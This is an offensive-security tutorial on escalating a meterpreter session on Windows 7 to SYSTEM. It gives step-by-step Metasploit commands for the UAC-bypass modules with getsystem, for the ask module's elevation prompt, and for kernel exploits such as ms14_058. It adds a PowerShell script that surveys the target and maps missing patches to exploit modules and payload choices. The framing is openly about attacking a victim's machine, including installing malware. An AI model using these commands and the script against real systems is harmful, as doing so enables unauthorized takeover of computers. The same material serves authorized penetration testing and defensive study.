Objective
Once you have a foothold on the victim's machine you often find that some actions are denied. To get full control of the machine you need to get around those restrictions and obtain privileges the current session does not have, which can then be used to delete files, read private information, or install programs such as malware. Metasploit ships a number of post-exploitation modules that bypass the permission checks on the target machine and ultimately give SYSTEM-level access.
Environment requirements:
1. Attacker machine: Kali Linux
2. Target machine: Windows 7
Once a meterpreter shell has been obtained (assume it is session 1) and getuid shows that it is not running as SYSTEM, use one of the methods listed below.
First, bypassing UAC to escalate privileges
This method relies mainly on the following three modules:
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
The details of these Metasploit modules have already been introduced, so only their usage is covered here, taking exploit/windows/local/bypassuac as the example.
The module works on both 32-bit and 64-bit Windows.
msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 1
msf exploit(bypassuac) > exploit
When the module succeeds, a new Meterpreter shell is returned, as shown below.
In the new session run getuid. If it still reports an ordinary user, do not give up: the UAC bypass has given you an elevated (high-integrity) administrator shell, not SYSTEM. Run getsystem, which uses that administrator token to impersonate SYSTEM, then check getuid again; UAC has been bypassed and the session now has SYSTEM privileges.
The other two modules are used in exactly the same way but work on a different principle. After a successful run each returns a new Meterpreter shell, and in every case getsystem must still be run to obtain SYSTEM privileges. They are:
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
Second, raising the program's run level (runas)
This method uses the exploit/windows/local/ask module. Note that it does not bypass UAC at all: it simply re-launches the payload with a request for elevation, which triggers the normal UAC prompt on the victim machine asking the user whether to allow the program to run. If the user clicks "Yes", an elevated meterpreter shell is returned (getsystem still has to be run to get SYSTEM). As follows:
A UAC prompt appears on the victim machine asking the user whether to run the program, as shown below:
Third, using Windows vulnerabilities to escalate privileges
Metasploit already contains local exploits for several Windows vulnerabilities, such as ms13_053, ms14_058, ms16_016 and ms16_032. Take ms14_058 as an example.
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
msf exploit(ms14_058_track_popup_menu) > exploit
When a Windows vulnerability is used for escalation, the returned Meterpreter shell already runs as SYSTEM, so there is no need to run getsystem.
One thing to note: if, in a real test, the target does have the vulnerability but the escalation still fails, check that the target and payload are set correctly. On a 64-bit system it is best to use a 64-bit payload.
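As an added example that is not part of the original post, covering both the UAC-bypass method and the kernel-exploit method: a PowerShell pre-flight script to run on the Windows 7 target (for example through meterpreter's shell command) before choosing a module. It reports the current integrity level, whether the account is in the local Administrators group (the bypassuac modules only help an administrator holding a UAC-filtered token; a plain user needs the third method), the UAC policy (the bypassuac modules do not defeat the "Always notify" level, whereas the ask module's prompt still works), which of the listed kernel exploits still have their fix missing, and the payload architecture the caveat above calls for. The function names are mine, and the full module names and the bulletin-to-KB mapping are assumptions taken from the Microsoft bulletins and Metasploit module tree as I know them; verify them before relying on the output. It avoids PowerShell 3.0-only syntax so it runs on a stock Windows 7 (PowerShell 2.0).

```powershell
# Added pre-flight check for the escalation methods above (example code, not from the post).
# Function names are mine; KB numbers and full module names are assumed from the MS
# bulletins / Metasploit module tree and should be verified against current advisories.

function Get-IntegrityLevel {
    # whoami /groups prints e.g. "Mandatory Label\Medium Mandatory Level".
    # Medium = administrator running under the UAC-filtered token (bypassuac territory),
    # High   = already elevated, so getsystem alone should reach SYSTEM.
    $line = whoami /groups | Where-Object { $_ -match 'Mandatory Label' } | Select-Object -First 1
    if ($line -match 'Mandatory Label\\(\w+) Mandatory Level') { return $Matches[1] }
    return 'Unknown'
}

function Test-LocalAdminGroup {
    # Group membership from the token, not the enabled state of the admin group: a filtered
    # UAC token still lists BUILTIN\Administrators, which is exactly what bypassuac needs.
    $id  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $sid = 'S-1-5-32-544'   # BUILTIN\Administrators
    return [bool]($id.Groups | Where-Object { $_.Value -eq $sid })
}

function Get-UacState {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $key
    # EnableLUA 0                   : UAC is off, run getsystem straight away
    # ConsentPromptBehaviorAdmin 2  : "Always notify"; the bypassuac modules do not defeat it,
    #                                 only the ask module (user clicks Yes) still works
    # ConsentPromptBehaviorAdmin 5  : the Windows 7 default, bypassable
    New-Object PSObject -Property @{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
    }
}

function Get-CandidateKernelModules {
    # Bulletin-to-KB mapping for the local exploits named in the post (assumed, verify).
    # A missing KB is only a hint: later rollups supersede these fixes without listing the
    # original KB, so a module can still fail on a box that Get-HotFix makes look unpatched.
    $map = @{
        'exploit/windows/local/ms13_053_schlamperei'                    = 'KB2850851'
        'exploit/windows/local/ms14_058_track_popup_menu'               = 'KB3000061'
        'exploit/windows/local/ms16_016_webdav'                         = 'KB3136041'
        'exploit/windows/local/ms16_032_secondary_logon_handle_privesc' = 'KB3143141'
    }
    $installed = Get-HotFix | ForEach-Object { $_.HotFixID }
    foreach ($entry in $map.GetEnumerator()) {
        if ($installed -notcontains $entry.Value) {
            New-Object PSObject -Property @{ Module = $entry.Key; MissingKB = $entry.Value }
        }
    }
}

function Get-PayloadForTarget {
    # Matches the caveat above: on a 64-bit OS set a 64-bit payload, otherwise the exploit
    # can report success and never hand back a session.
    $arch = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
    if ($arch -like '64*') { 'windows/x64/meterpreter/reverse_tcp' }
    else { 'windows/meterpreter/reverse_tcp' }
}

$uac = Get-UacState
"Integrity level    : $(Get-IntegrityLevel)"
"In Administrators  : $(Test-LocalAdminGroup)"
"UAC                : EnableLUA=$($uac.EnableLUA) ConsentPromptBehaviorAdmin=$($uac.ConsentPromptBehaviorAdmin)"
"Payload to set     : $(Get-PayloadForTarget)"
"Kernel modules whose fix is not listed by Get-HotFix:"
Get-CandidateKernelModules | Format-Table Module, MissingKB -AutoSize
```

Read the output top to bottom: Medium integrity plus Administrators membership plus ConsentPromptBehaviorAdmin 5 means the first method applies; Medium integrity without Administrators membership means only the third method (or a user clicking through the ask prompt) can help; High integrity means getsystem alone is enough. Whatever the table of candidate kernel modules says, set the payload the last line reports before running exploit.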
Reference links
http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/?utm_source=tuicool&utm_medium=referral
Multiple privilege-escalation methods for Windows under Metasploit